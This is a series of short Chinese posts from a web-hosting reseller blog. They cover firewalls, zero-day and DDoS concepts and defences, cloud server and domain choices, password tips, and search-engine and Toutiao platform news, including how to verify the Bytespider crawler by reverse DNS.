可以说,二者区别甚大,两者之间的选择将取决于防火墙的用途。 硬件防火墙具有更好的安全性,是大多数企业用户的首选。然而,它比软件防火墙贵一点,并且设置配置可能需要更复杂的系统网络知识以获得更好和更优选的性能。 另一方面,软件防火墙的成本更低,设置配置通常更简单。它是大多数家庭用户的首选。 但最佳的防火墙配置是二者兼有。这样的话可以提供更高的安全性,也提供更多的配置,但是这样成本也会更高哟。 硬件防火墙性能上优于软件防火墙,因为它有自己的专用处理器和内存,可以独立完成防范网络攻击的功能,不过价格会贵不少,更改设置也比较麻烦。而软件防火墙是在作为网关的服务器上安装的,利用服务器的CPU和内存来实现防攻击的能力,在攻击严重的情况下可能大量占用服务器的资源,但是相对而言便宜得多,设置起来也很方便。 #### 什么是零日漏洞 零日漏洞定义及危害详解 这是一个网络安全领域的核心概念,理解它对于认识现代数字世界的风险至关重要。核心定义零日漏洞是指软件或硬件中存在的、尚未被软件开发商或供应商知晓的安全缺陷。这里的“零日”(Zero-day)指的是,从漏洞被攻击者发现并利用开始,到软件开发商知道这个问题并发布修复补丁为止,开发商拥有的“零天”时间来做出反应。攻击者已经抢占了先机。一个生动的比喻想象一下,你家的门锁有一个连制造商都不知道的设计缺陷。一个小偷发现了这个缺陷,可以用一种特殊的方法轻松打开所有同型号的门锁,如入无人之境。漏洞:门锁的设计缺陷。零日:在小偷开始利用这个缺陷行窃时,锁具制造商还完全不知道这个缺陷的存在(“零天”知晓时间)。后果:在小偷行窃的这段时间里,所有安装了这种门锁的家庭都处于毫无防备的危险之中,因为根本没有可用的新锁来更换。直到有一天,有家庭被偷后报了警,制造商才通过调查发现了这个缺陷,并开始研发和分发新的、没有缺陷的门锁(补丁)。从漏洞被利用到补丁发布之前的这段“空窗期”,就是零日攻击 window。相关术语:理清整个攻击链通常,“零日漏洞”这个词会被用来泛指整个攻击过程,但严格来说,它只是攻击链的一部分:零日漏洞:软件中未知的安全缺陷本身。零日利用:攻击者编写的、专门用于利用该漏洞进行攻击的代码或方法。就像开锁的那套特殊工具。零日攻击:攻击者使用“零日利用”代码,对存在“零日漏洞”的系统发起的实际攻击行为。就像小偷实际上去用工具开锁偷东西。所以,完整的流程是:发现漏洞 -> 开发利用代码 -> 发起攻击。零日漏洞为什么如此危险?无预警:由于软件开发商不知道漏洞的存在,因此不会发布任何安全公告或补丁。无防护:主流的杀毒软件、防火墙等安全产品没有该漏洞的特征码,无法检测和阻止这种攻击。高成功率:攻击几乎可以100%成功,因为目标系统没有任何针对性的防御。高价值:零日漏洞在黑客地下市场、甚至国家之间都是价值连城的“商品”,一个针对主流系统(如Windows, iOS)的零日漏洞可以卖到数十万甚至上百万美元。谁在使用零日漏洞?网络犯罪分子:用于窃取银行凭证、个人数据,部署勒索软件,或创建巨大的僵尸网络。高级持续性威胁:通常有国家背景的黑客组织,用于进行网络间谍活动,窃取政府、企业、科研机构的机密。国家情报机构:用于监控和收集他国情报。安全研究人员:他们是“白帽子”黑客,负责寻找漏洞并负责任的披露给厂商,以帮助修复,提升整体安全性。著名的零日攻击案例Stuxnet震网病毒:2010年被发现,利用了多个Windows零日漏洞,攻击伊朗的核设施离心机,是首个已知的数字化武器。WannaCry勒索软件:2017年全球爆发,虽然它利用的是已知漏洞(EternalBlue),但该漏洞最初是由美国国安局(NSA)发现的零日漏洞并被保密,后来被黑客组织窃取并武器化,造成了巨大损失。总结零日漏洞是一种未被官方发现的软件缺陷,它赋予了攻击者一种“隐形”的攻击能力,在防御方毫不知情的情况下造成严重破坏。它是网络安全军备竞赛中的“王牌武器”,也是所有软件开发商和安全团队试图抢先发现和修复的最高优先级目标。对于普通用户而言,最好的防御措施永远是及时更新软件和操作系统,因为一旦零日漏洞被曝光,开发商发布补丁后,它就不再是“零日”漏洞了。及时更新就能保护自己免受后续攻击。 #### 什么样的云服务器适合你 云服务器目前显然已经为了网站建设、APP标配了,比如主机吧这个博客就是用云服务器运行的,相比以前的虚拟主机贵了不少,非常适合主机吧运行。 今天就来谈谈什么样的云服务器适合我们使用。 一、品牌 如果是个老站长一定会发现以前一些能叫上名字的服务商已经慢慢消失在互联网上了,没错,基本都是倒闭了。因为云服务时代来了,一些老牌的IDC服务商基本挂了,主机吧以前认识的一些做虚拟主机、服务器托管的比较好的都倒闭了,前几天一个客户还因为服务商关闭了搬数据搬了好几天。所以我们在选云服务器的时候首先一定要看品牌,目前国内云服务商排前几的,阿里云、腾讯云、华为云、百度云这些都是不错,有实力,有钱,而且都是把云服务当成重中之重,比如百度云上周就把智能云部门升级到搜索部门一个级别了,可见未来百度云一定是砸重金的。如果排前几的你看不上,那可以考虑西部数码云服务器,相比较阿里腾讯这些,西部数码属于二线服务商,实力肯定有的,而且售后好。 二、安全 安全这点和品牌差不多,一定不要选小服务商的,因为这些服务商很可能哪天就跑路了,到时你连数据都拿不回来。而且要选那些云服务器有多重备份的,大家别以为云服务器就很安全,事实上这是相对的,云服务器数据丢失的案例不在少数,很多小型服务商的服务器都是没有备份的,一但某服务器硬盘坏了,基本找不回了。 三、稳定 一个稳定的云服务器非常重要,因为这绝对会影响百度等搜索引擎对你网站的印象,稳定的服务器可以增加收录,搜索引擎会给你网站一个好的排名,从而得到更多的访问量。找稳定的服务商技巧其实很简单,对内容审核严格的,国内前十的云服务商都是可以肯定的,为什么要选内容审核严格的呢,因为违法违规内容的网站最容易被攻击,而且是量大的攻击,一但这个服务器攻击量超过一定量后,会影响整体网络的稳定性,也就是会影响到你的云服务器,所以要点是要选择正规的服务商。 四、高速多线机房 家里装有移动联通的宽带的朋友一定会发现有时候访问某个网站速度非常慢,甚至打不开。这是因为国内有些网站是放在纯电信机房上的,而其它线路访问这个网站是非常慢的甚至打不开。 所以我们在选机房的时候一定要选多线机房,目前都叫的BGP多线机房,涵盖电信联通移动教育网等国内网络,可以保证网站不管是对方拉哪条宽带都可以正常访问。目前国内排前几的云服务商都是自建机房,都是BGP多线机房,所以没多大差别,而西数的是托管机房,在线路上定要选好,否则移动访问不了那就亏大了,因为现在移动互联网时代,有将近7成的访问量都是来自移动的。 五、备案方便 这点做过网站的都知道,备案是相当麻烦的,前几年还要求本人必须到备案点拍照,现在好多了,很多都是网上操作,西部数码和阿里云甚至可以直接手机APP操作了。 六、升级续费便宜 买过阿里云服务器都知道,阿里云首年的价格相当便宜,可以说白菜价,特别是双11的时候优惠力度空前,一个2核4G2M的云服务器几百块钱一年就可以搞定,但是这其实是一个坑,因为一但你要升级或者续费的时候你会发现价格远比买的时候贵,贵好几倍的那种。这也就导致很多站长服务器基本都是一年一换,内容少的基本没啥影响,内容要是多的话每年换一次那多麻烦,而且频繁更换服务器如果操作不当的话会出现数据丢失等问题,那问题就大了。有些站长可能会觉得买一个基本配置的服务器没什么流量根本不需要升级,那就错了,以主机吧博客为例,一开始只是用一个2核2G2M的云服务器而以,结果用到现在流量没加多少,但是没有4核4G5M配置会出现经常CPU内存宽带满的情况,也就现出了有时候一卡一卡的现象,所以有必要一开始就买高配置的,以免以后升级价格超贵。至于续费问题主机吧建议在双11的时候购买那种一次性两年三年套餐,别怕浪费,怕浪费就不要做网站。千万别买那种低配置的,1核2核啥的别考虑,到时升级比你买的还贵。 以上就是主机吧多年来在选择云服务器方面的一些见解,希望可以帮到大家,有需要云服务器的也可以找我,主机吧代理西部数码、百度云等一二级品牌服务器,价格优惠欢迎咨询。   #### 什么样的域名自带流量? 想要减少推广成本,最简单的方法是起一个自带流量的域名,那么什么样的域名自带流量呢? 今天主机吧就来盘点下: 对应品牌名称:如果你的品牌在某个领域已经有了一定的知名度,那么将品牌名称作为你的网站域名,这样在搜索引擎上就会有自带流量和客户的效果。例如,如果一家名为Anker的公司已经在海外打开了知名度,那么它的网站域名Anker.com就会自带流量。 品类关键词或受众相关域名:如果你无法获取与你品牌名称完全匹配的域名,你可以考虑选择与你产品或服务相关的品类关键词或受众相关的域名。例如,如果你的公司销售大码鞋,你可以选择类似"damaxie.com"这样的域名。 Typo域名:这种类型的域名是基于人们常见的键盘输入错误设计的,例如,人们在输入"google.com"时可能会误输入"guge.com"。虽然这种类型的域名可能不会带来大量的流量,但它仍然有一定的价值,因为它可以吸引一部分原本打算去其他网站的用户。 热门关键词域名:如果你的域名包含了热门的关键词,那么它就有可能自带流量。比如,如果你的网站是关于旅游的,那么“huangshan.com”或者“zhangjiajie.com”这样的域名就可能自带流量。 行业特定域名:如果你的域名是针对某个特定行业的,那么它也有可能自带流量。比如,如果你的网站是关于编程的,那么“code.com”或者“coder.com”这样的域名就可能自带流量。 热门话题或事件域名:如果你的域名是关于某个热门话题或事件的,那么它也有可能自带流量。比如,如果你的网站是关于电子竞技英雄联盟游戏的,那么“lpl.com”或者“s13.com”这样的域名就可能自带流量。 常用词汇或短语域名:如果你的域名是常用的词汇或短语,那么它也有可能自带流量。比如,“hello.com”或者“goodbye.com”这样的域名就可能自带流量。 但是,需要注意的是,虽然这些类型的域名可能会自带流量,但这并不意味着它们一定能帮助你成功。你还需要考虑其他因素,如域名的可用性、易用性和是否符合你的品牌形象等。 #### 什么样的帐号密码最安全? 5 月 5 日是世界密码日(World Password Day),今天,Google 分享了 10 条建议,希望能帮助大家养成良好的密码使用习惯,保护好自己使用的数十个、甚至是成百个账号。 一起来看看这 10 条建议: 1.  为每个账号设置不同的密码,不要重复使用密码,特别是那些较为重要的账户,否则,一旦有一个账户的密码被盗,其它的账户都会面临严重的风险,导致邮件或地址泄露,乃至经济损失; 2. 密码越长,就越难被破解,如果情况允许,最好是长于 12 个字符; 3. 在设置密码时,使用大写字母、小写字母、数字和符号的组合; 4. 在设置密码时,要有必要的“创意”,不要使用个人信息,或者其他人容易知道或猜出来的信息,比如出生日期、宠物的名字和邮政编码等等; 5. 要将密码当作需要严格保守的秘密,不要随便和他人分享密码,即使是亲人或朋友; 6. 使用密码管理器设置、记忆和储存密码; 7. 保持默认密码的定期更新; 8. 使用密码检查工具检查密码强度,及其是否已经被盗用或在不同账号被重复使用等; 9. 为账号添加电话号码或电子邮件地址等信息,用于在密码被盗时恢复账号; 10. 为账号设置额外验证方式,如两步验证。 #### 什么样的网站容易被DDoS攻击 要如何防御DDoS攻击 DDoS攻击日趋增强 据卡巴斯基2018 Q3全球DDoS攻击分析报告指出,在DDoS攻击方面,2018年第三季度相对平静。所谓“相对”,是因为主要资源上没有出现很多高级别或者连续多日的DDoS攻击。然而,犯罪分子攻击能力日趋增强,而攻击的总数却丝毫没有显示出下降的迹象。从攻击地理来说,中国仍然占据上限,其份额从59.03%飙升至77.67%。美国重新获得第二个位置,尽管它已经增长了0.11个百分点,达到12.57%。 (图片来源:卡巴斯基) 什么是DDoS攻击? DDoS攻击,又叫分布式拒绝服务攻击,指借助于客户/服务器技术,将多个计算机联合起来作为攻击平台,对一个或多个目标发动DDoS攻击,从而成倍地提高拒绝服务攻击的威力。 举个例子快速了解DDoS攻击: 一个店铺同一时间只能接待50个顾客,这时候竞争对手安排了50个人进来,他们进来以后占据着位置,赖着不走,并且提出一些乱七八糟的需求,让服务人员乱作一团,也让真正有需求的顾客无法进来,最终导致店铺损失惨重。 这就是 DDoS 攻击,它在短时间内发起大量请求,占据消耗服务器的资源,无法响应正常的访问,造成网站瘫痪。 为什么你的网站会被DDoS攻击? 正所谓无利不起早,没有无缘无故的DDoS攻击,毕竟DDoS攻击成本也是非常高的,只有收益大于成本,攻击行为才有意义。当收益足够大时,黑客就敢于冒更大的风险。 DDoS攻击-敲诈勒索 DDoS攻击者选取目标网站,事前发送勒索信息,索取“保护费”,不然将进行DDoS攻击,对其业务进行摧毁性打击。也有发动了DDoS攻击以后,然后再发送勒索信,如果受害者不按照要求支付,就会继续遭受攻击。 比如:韩国多家银行在2017年就遭到DDoS攻击威胁,著名的黑客组织“无敌舰队组织”向韩国7家银行进行勒索,要求7家银行以支付比特币的形式缴纳赎金,否则将发起DDoS攻击。“无敌舰队组织”向他们提出要求,最迟要在周一支付约30万美元的赎金,否则将正式发起DDoS攻击。 DDoS攻击-恶意竞争 DDoS攻击现在已不再只针对一些大型网站,一些初创型网站刚刚冒头,日均ip和流量正逐渐提高,很可能会遭遇一些不正当的竞争,对手雇佣黑客对你的网站进行DDoS攻击。尤其是在游戏、电商、金融行业,逐步占领市场也好,一家独大也好,在经历过几次DDoS攻击,出现无法登陆、掉线等情况,用户自然就会流失,网站也会日益衰败。 游戏行业成为DDoS重灾区! 随着游戏行业的大力发展,游戏行业的DDoS攻击的成本较低,游戏行业已经成为黑客眼中的肥肉。原因在于: 1.    游戏行业火爆,用户量大,同行竞争激烈; 2.    游戏行业对于用户体验要求高,需要不中断连续运转; 3.    游戏行业生命周期短,一旦被攻击可能导致用户大量流失; 4.    游戏行业的开发者资金更加充足。 根据卡巴斯基实验室客户数据显示DDoS攻击电子竞技运营商和网站的目的是拒绝访问,这种攻击正变得越来越普遍。 如何发现网站正被DDoS攻击? 网站流量访客异常增加,网络带宽资源占用率飙升接近饱和,网站服务器接收到大量无效请求,服务器CPU资源被大量占用,造成网站运行缓慢,连接打不开,甚至服务器直接宕机瘫痪。还有一种情况就是域名ping出不来IP,这种情况出现在攻击针对的目标为网站的DNS域名服务器。 DDoS都有哪些攻击方式? DDoS常见的攻击有SYN Flood攻击、ACK Flood攻击、UDP Flood攻击、DNS Flood攻击、CC攻击等。这些攻击方式可分为以下几种: 1、通过使网络过载来干扰甚至阻断正常的网络通讯; 2、通过向服务器提交大量请求,使服务器超负荷; 3、阻断某一用户访问服务器; 4、阻断某服务与特定系统或个人的通讯。 像SYN攻击从早期的利用TCP三次握手原理,伪造的IP源,以小博大,难以追踪,堪称经典的攻击类型。大量的伪造源的SYN攻击包进入服务器后,系统会产生大量的SYN_RECV状态,最后耗尽系统的SYN Backlog,导致服务器无法处理后续的TCP请求,导致服务器瘫痪。 DDoS攻击如何防御? 1、采用高性能的服务器,CPU处理能力更强; 2、开通更高的网络带宽,带宽决定抗攻击的能力; 3、把网站做成静态页面或者伪静态; 4、启用 SYN 攻击保护; 5、关闭不必要的服务,限制同时打开的Syn半连接数目; 6、开通Anti-DDoS流量清洗,DDoS高防服务; 7、安装专业防CC攻击的Web应用防火墙; 8、HTTP 恶意请求直接拦截; 9、备份网站,网站出了问题,正在全力抢修; 10、部署高防CDN,用户就近访问,提高速度在,比如用百度云加速。 #### 今天百度云加速彻底停服了 目前登陆已经进不了控制台了,而根据百度的公告,5月30号开始停服了,今天算是彻底停服了。 这个诞生了十几年的云加速产品,可以说是经历了站长的巅峰到低谷,今天拜拜了! 目前云加速的用户已经迁移至百度云防护了,有需要的同学可以了解下。 详细介绍:https://zhujib.com/shop/26864.html #### 今天百度收录大涨了 之前不断下跌的百度索引量开始大涨回来了 主机吧看了下站长论坛里的站长基本都是涨的 看来,今天是百度每月一度的索引更新时间了,百度每月都会有一次大更新,要么大家一起大涨,要么一起大跌,上个月就是大跌。 不过,以主机吧的经验来看,大涨大跌其实对网站流量没多大帮助,而且即使索引量增加了,百度也不一定放出来。索引量只能作为参考,并不是真正意义上的收录。站长们还需加油! #### 今年以来遇到的最高的DDOS攻击936G 最近一位做游戏的客户被打惨了,DDOS攻击最高峰值936G 导致服务器IP一度被机房封了24小时。为此我们研究一系列防御方法,如果升级更高防御的话,价格贵得飞起。 在咨询客户业务后,我们得知客户游戏业务并不需要UDP协议,以及不需要海外访问。那么就好办了,我们给客户搬迁至华东的BGP机房,该机房上层封锁UDP流量,同时支持封禁海外流量。这样一来攻击流量就会少很多。 果然攻击流量直接降了一大截,目前业务稳定运营中。 从这案例我们得出,如果业务不需要用到UDP和海外访问的话,可以选择一些封禁UDP和访海外访问的机房,这样可以减少很多攻击流量,因为UDP的攻击流量一般是非常大的,而往往攻击的肉鸡都是来自海外,封禁海外流量等于打断了黑客的一条腿。 有需要防御的同学可以联系主机吧。 #### 今年有384天,2023年为什么有384天呢? 通常情况下,一年只有365天,但已经到来的癸卯兔年竟然有多达384天,多出了将近20天,这是为何? 据央视网快看科普,根据历法,癸卯兔年是个双春年”,一年中会有两个立春节气,这两次立春分别会出现在2023年2月4日,农历正月十四,以及2024年2月4日,农历的腊月二十五。 立春节气在公历中的日期基本是固定的,而它在农历中的日期则不是固定的,大致可在农历腊月中旬到正月中旬之间变化,这与农历的闰月有关。 农历癸卯兔年闰二月,全年共384天,这样一来全年比平常年份多出近20天时间,冬季的时间就会比较的漫长。 中国天文学会会员、天津市天文学会理事赵之珩介绍,公历和农历各有不同的历史渊源和历法规制。 公历每4年设一闰年,通常情况下,凡公历年数能被4除尽的年份为闰年,2月有29天;除不尽的年份为平年,2月有28天。2023年不能被4除尽,所以是平年,共有365天。 农历是以月亮圆缺变化的周期为依据,一个朔望月为一个月,约29.53天,全年一般是354天或355天,比公历年(也称回归年、太阳年)的365天或366天少了11天。 为了使农历年的长度和公历年的长度接近,古人采用增加闰月的方法,即在19个农历年中加入7个闰月;有闰月的那一年有13个月,全年一般是384天或385天,叫作闰年。这样一来,19个农历年和19个公历年的长度几乎相等。 至于闰月具体安置在哪一个月,这和二十四节气的中气”有关。 二十四节气由12个节气和12个中气组成,月首叫节气”,月中叫中气”,两者相间排列,加闰月的规则是每个月中,凡含有中气的算正常月份,不含中气的就算上一个月的闰月。 农历癸卯兔年的闰二月”没有中气,所以就是上一个月二月的闰月,由于被安排了一个闰二月”,农历癸卯兔年全年共有384天,从2023年1月22日开始,至2024年2月9日结束。 #### 今年站长有福了,阿里云宣布史上最大规模降价,腾讯云华为云或跟进! 去年还在抱怨阿里云没有优惠的同学,今年可能要高兴了,阿里云宣布史上最大规模降价,核心产品价格全线下调15%至50%,存储产品最高降幅达50%。 据悉,阿里云此次降价,意图进一步扩大公共云的用户基数和规模,提升云计算的市场渗透率。 其它云服务商估计也会跟进,那样的话,今年估计是云服务商内卷的一年! 刚好主机吧的服务器今年也要到期了,这个时候内卷,对站长来说是福音! #### 今年第六批 11 家非法社会组织网站被关停 9月17日消息:据央视新闻报道,近日民政部、中央网信办、工业和信息化部深入贯彻落实党中央决策部署,持续发力,精准打击,依法关停了2021年第六批11家非法社会组织网站及其新媒体账号,清除了有关关联网页。此次关停涉及中国武警基金会、国际武术发展协会、中华陶瓷大师联盟、中国天使投资联盟、中国慢性病康复理疗研究院等11家已被取缔的非法社会组织。 民政部欢迎社会各界登录中国社会组织政务服务平台(www.chinanpo.gov.cn),通过“投诉举报”栏目,提供涉嫌非法社会组织活动信息、主要负责人及骨干人员的线索信息。 再次提醒有关机构和社会公众,在与社会组织开展合作或者参与其活动时,务必注意核查其身份。全国社会组织的登记信息可通过中国社会组织政务服务平台(www.chinanpo.gov.cn)、中国社会组织动态政务微信(微信号:chinanpogov)等渠道在线查询。 2021年第六批被关停网站的11家非法社会组织名单 1.中国武警基金会 2.国际武术发展协会 3.中华陶瓷大师联盟 4.中国天使投资联盟 5.中国慢性病康复理疗研究院 6.中国膜结构行业协会 7.中国建筑环境设计产业联盟 8.中华兰陵爱心联盟慈善总会 9.中小城市公交改革与发展企业联合会 10.全国工程机械行业商协会联盟 11.中工智能制造产业联盟 #### 今日头条发布2021年度报告 12月29日 消息:今日,今日头条发布了《 2021 今日头条年度搜索报告》,从年度热词、新闻等多个维度回顾了过去一年人们搜索的内容。 其中,“生”字在 2021 年被搜索了1,691,317, 210 次,成为头条搜索年度汉字。 同时,全红婵、袁隆平等入选“十大热门人物”。河南暴雨、郭刚堂找到失散 24 年儿子入选“十大热门新闻”。 在 2021 头条搜索十大热词中,疫苗、奥运、芯片、航天、双减、乡村振兴、三孩政策、反诈、双碳、元宇宙入选。 此外,报告还显示,《长津湖》、《扫黑风暴》、《你好,李焕英》、《乡村爱情》、《唐人街探案》、《亮剑》、《你是我的荣耀》、《山海情》、《觉醒年代》、《甄嬛传》入选 2021 头条搜索热门国产影视作品TOP10。 #### 今日头条搜索上线官网认证功能 12 月 29 日起,头条搜索已经针对品牌官网,批量提供了免费的官网认证功能,通过站长平台(https://zhanzhang.toutiao.com/),公开了官网认证提交通道(获取路径:网站工具—官网认证)。 工具说明: 如果网站官网没有被头条搜索收录或者收录后寻址需求下官网排序较低, 站长可以使用官网认证工具将官网需求关键词、网站的官网URL提交给头条搜索, 头条搜索按照既定标准审核通过后会在头条搜索结果页进行展示, 详见官网认证审核标准 注意事项: 1.通过官网认证并不等于展示“官网”标识。官网认证是在特定关键词下,保障官网排序的工具机制,因为站点情况不同,不承诺所有网站都会展示“官网”标识 2.官网需求词应该具有唯一性,应该保证大部分用户搜索该词时找的就是您的网站, 例如:https://www.douyin.com对应的官网需求词可以是“抖音“,也可以是“抖音官方网站”、“抖音官网”, 不可以是“小视频平台”等与网站不相关词,如果发现连续3次不符合标准,将导致官网需求词提交功能冻结7天 3.如果遇到其他网站冒充官网结果可以通过zhanzhang@bytedance.com进行举报,人工审核通过后则对冒充官网的网站进行打压 #### 今日头条搜索(抖音搜索)蜘蛛爬虫UA大全 头条搜索UA介绍 头条搜索的爬虫UA为“Bytespider”首写字母为大写,例如: PC Mozilla/5.0 (compatible; Bytespider; https://zhanzhang.toutiao.com/) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36 Android Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; https://zhanzhang.toutiao.com/) iOS Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.36 (KHTML, like Gecko) Version/7.0 Mobile Safari/537.36 (compatible; Bytespider; https://zhanzhang.toutiao.com/) 头条搜索ip字段介绍 头条搜索的ip字段总共涉及10个ip,具体字段如下: 110.249.201.0/24 110.249.202.0/24 111.225.148.0/24 111.225.149.0/24 220.243.135.0/24 220.243.136.0/24 220.243.188.0/24 220.243.189.0/24 60.8.123.0/24 60.8.151.0/24 基本流程 1. 抓取网页 每个独立的搜索引擎都有自己的网页抓取程序爬虫(Spider)。爬虫顺着网页中的超链接,从这个网站爬到另一个网站,通过超链接分析连续访问抓取更多网页。被抓取的网页被称之为网页快照。由于互联网中超链接的应用很普遍,理论上,从一定范围的网页出发,就能搜集到绝大多数的网页。 2. 处理网页 搜索引擎抓到网页后,还要做大量的预处理工作,才能提供检索服务。其中,最重要的就是提取关键词,建立索引库和索引。其他还包括去除重复网页、分词(中文)、判断网页类型、分析超链接、计算网页的重要度/丰富度等。 3. 提供检索服务 用户输入关键词进行检索,搜索引擎从索引数据库中找到匹配该关键词的网页;为了用户便于判断,除了网页标题和URL外,还会提供一段来自网页的摘要以及其他信息。 Bytespider IP反解析 反查IP 站长可以通过DNS反查IP的方式判断某只spider是否来自头条搜索引擎。根据平台不同验证方法不同,如linux/windows/os三种平台下的验证方法分别如下 在linux平台下,您可以使用host ip命令反解ip来判断是否来自Bytespider的抓取。Bytespider的hostname以*.bytedance.com的格式命名,非 *.bytedance.com即为冒充host 111.225.148.250148.148.225.111.in-addr.arpa domain name pointer bytespider-111-225-148-148.crawl.bytedance.com. 在windows平台或者IBM OS/2平台下,您可以使用nslookup ip命令反解ip来判断是否来自Bytespider的抓取。打开命令处理器 输入nslookup  -qt=ptr  xxx.xxx.xxx.xxx(IP地 址)就能解析ip,来判断是否来自Bytespider的抓取,Bytespider的hostname以*.bytedance.com 的格式命名,非*.bytedance.com 即为冒充。 在mac os平台下,您可以使用dig命令反解ip来判断是否来自Bytespider的抓取。打开命令处理器输入dig -x xxx.xxx.xxx.xxx(IP地址)就能解析ip, 来判断是否来自Bytespider的抓取,Bytespider的hostname以 *.bytedance.com的格式命名,非 *.bytedance.com即为冒充。 问题反馈 如果您的网站发现有头条spider的UA Bytespider 抓取存在抓取量过大,导致您的网站出现缓慢、宕机等问题,您可以通过“抓取频次”功能,对网站进行设置抓取要求,我们会在1天内时间内生效。 关于spider有其他问题,可以向zhanzhang@bytedance.com提交反馈,我们会及时处理。 官方地址:https://zhanzhang.toutiao.com/page/outer/docs/26899 #### 今日头条旗下头条百科测试版baike.com上线 4月30日 消息:近日,头条百科测试版正式上线,用户可通过PC及移动端访问baike.com,或者可在今日头条客户端搜索“头条百科”。 此前,字节跳动已在移动端网页上线了“头条百科”,通过PC端查看仍为“互动百科”页面。 去年 9 月,字节跳动已完成对互动百科的全资收购,持股100%。其中,互动百科所属公司北京互动百科网络技术股份有限公司大股东为北京互动极致科技有限公司,占股77.78%,第二大股东为北京量子跃动科技有限公司,占股22.22%。而这两大股东均由北京字节跳动科技有限公司100%持股。 #### 今日头条智能个性化推荐机制规则详细介绍(自媒体必看) 本文先介绍一下什么是今日头条智能个性化推荐,然后说明头条号推荐机制、规律。 1、什么是今日头条智能个性化推荐? 头条号跟微信公众号最大的区别是:头条号自带粉丝,就算头条号创作者没有粉丝也有可能获得百万千万的阅读量。决定头条号文章阅读量高低的是推荐量。头条号自媒体引用智能个性化推荐引擎,能够精准找到读者,无需求关注、求订阅也能拥有海量读者。 今日头条属于机器智能个性化推荐机制,即通过机器算法将用户发表的内容(视频、文章)分发给内容的受众。智能个性化推荐引擎会根据文章特征(内容质量、内容特征、首发情况、互动情况)、用户特征(头条号历史表、头条号订阅情况)以及环境特征(时间、地域、天气)等等,为文章找到感兴趣的读者并推荐给他们。 2、头条号推荐机制、规律 头条号推荐过程是这样的:只要审核通过,机器会首先尝试推荐一定的量,如果点击率和阅读完成率高,再进行新一轮更大范围推荐给更多的相似用户,如果减弱到一定程度,推荐过程就结束。 推荐过程第一个关键点:初始推荐量 审核通过后机器首先会尝试推荐一定的量。那到底这个一定的量是怎么算出来的呢?也即影响今日头条在审核通过后尝试推荐一定的量的最关键因素又是什么呢? 答案就是头条号指数。头条号指数可以理解为「你的内容有多值得被推荐」,这一指数是机器通过一段时间内对作者创作的内容和读者阅读、关注行为的记录和分析得出的帐号价值评分,包括健康度、关注度、传播度、垂直度、原创度等5个维度。头条号指数越高文章推荐越多。 推荐过程第二个关键点:二次推荐量 今日头条尝试推荐了一定数量之后,将根据读者的点击率和阅读完成率来决定是否再进行新一轮更大范围推荐,或者还是减少推荐量。 用户点击了,但不一定看完,看完数量除以点击数量就是阅读完成率。点击标题并读完文章的人越多,推荐越高。当然还有其他一些行为也影响二次推荐量,比如点赞、转发、收藏、评论互动,这样的行为对二次推荐也有很大的帮助。另外还有一个影响二次推荐很大的因素,那就是发文时间。文章发布的时间越长了,推荐的数量就越低了,理论上有72小时的推荐时间,事实上大部分不会超过48小时,而且80%以上的推荐量是在24小时内完成的。 头条号指数决定初始推荐量,点击率、阅读完成率、点赞、转发、收藏、评论互动这些行为又影响二次推荐量。而只有初始推荐后有了更多的点击率、阅读完成率,以及更多的点赞、转发、收藏、评论互动这些行为,才能有更好的二次推荐量。只有有了更多的二次推荐量,整个文章的阅读量才能起来,带动整个头条号指数的上升。而头条号指数上升了又能带来更多的初始推荐量,如此循环反复。 前面提到,头条号自带粉丝,只要审核通过,机器会首先尝试推荐一定的量。只要点击率和阅读完成率高,读者点赞、转发、收藏、评论这些行为多,就可以增加二次推荐量,也就可以带动头条号指数上升,即可以让上面图中这个循环进入良性轨道。 那要想一篇文章点击率和阅读完成率高,获得更多的点赞和转发,又取决于什么呢?这个就很简单了吧?优质内容是根本。只有内容好,读者喜欢才有可能进行这些行为,否则都是瞎扯。 3、最佳发文时间 经过前面分析之后,我们知道今日头条最大的特点就是智能个性化推荐,就算你的粉丝,也很少主动进到你的主页去查看你的文章。主要都是通过今日头条推荐给读者,读者才会点击阅读。 所以今日头条最关键的就是推荐量了,如果能找出今日头条在哪个时间段的推荐量大,就等于找出了今日头条的最佳发文时间。因为离发文时间越久,推荐量就越少,在超过24小时后基本上不会有推荐量了。 得出三个推荐量最高的时间段(按时间先后): 上午07:00---10:00共3个小时 中午11:00---13:00共2个小时 晚上22:00—-01:00共3个小时 那我们应该在哪个时间点发呢?结合前面分析的头条号推荐机制(规律)比较好得出以下结论: 上午和晚上比中午要好,为什么呢?因为中午发的话只能享受到两个小时的高推荐量,然后就得等到晚上了,而离发文时间越长,推荐量会越低的。所以最好的就是发文之后马上就是高推荐量时间,而且这个时间段越长越好。 那上午和晚上同样是三个小时,又是哪个时间发文更有效果呢?根据前面分析以及实践证明晚上要比早上好。这是因为晚上发文之后,从01:00---07:00只隔了6个小时就再次享受3个小时的高推荐量时间段。而如果是早上发文的话,从10:00---22:00点,需要等待12个小时才能再次享受3个小时的高推荐量时间段,而发文12个小时后,这个推荐量已经大大受影响了。 作者:洪炉点雪看世界(头条) #### 今日头条的“悟空问答”可能复活 2 月 2 日消息,“悟空问答”是字节跳动旗下的问答平台,于 2017 年由“头条问答”升级而来,不过已在 2021 年 2 月停止运营。 根据 Tech 星球获得的消息,两年前关停运营的“悟空问答”App 将择机再次上线,并会启用全新的产品 Logo,以今日头条风格的红白色为主,并配以“悟空”二字。 ▲ “悟空问答”App 新 Logo,图源 Tech 星球 爆料称,与此前关停的产品不同,复活后的悟空问答 App,将通过极简的设计,和更加聚焦基于搜索的功能设计,让用户直观地发现答案。 据了解,字节跳动于 2021 年 1 月发布公告,悟空问答 App 停止服务和运营,问答依旧会作为今日头条的重要体裁,以头条问答的形式继续运营。本次调整对帐号收益、内容推荐、帐号已有绑定关系以及帐号权益均无影响。 此外,悟空问答 App 中的收益、粉丝、内容、收藏等都已迁移至今日头条 App 及头条号后台和悟空问答 PC 端。 #### 今日头条社交软件“抖信”被爆将推出 有望挑战QQ微信 今日头条的社交软件要推出了,叫抖信,内部还先把商标给申请了,抖信一成,抖音粉丝可以直接导流至抖信私人号成交变现,估计不会再借道微信了。抖音变“抖商”,社交领域深耕细作新的小风口或许来了。 